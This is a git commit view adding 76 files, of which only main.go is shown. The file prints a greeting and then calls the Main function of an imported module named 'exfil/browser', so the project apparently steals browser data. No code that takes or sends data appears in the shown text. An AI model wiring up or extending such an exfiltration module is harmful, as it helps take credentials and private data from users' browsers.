Upload of project source code files.

This commit is contained in:
2026-02-17 04:01:29 +01:00
parent 8eee3bb938
commit 38704ce1ad
76 changed files with 257 additions and 0 deletions

11
main.go Normal file
View File

@@ -0,0 +1,11 @@
package main
import (
"adderall/modules/exfil/browser"
"fmt"
)
func main() {
fmt.Println("Hello, World!")
browser.Main()
}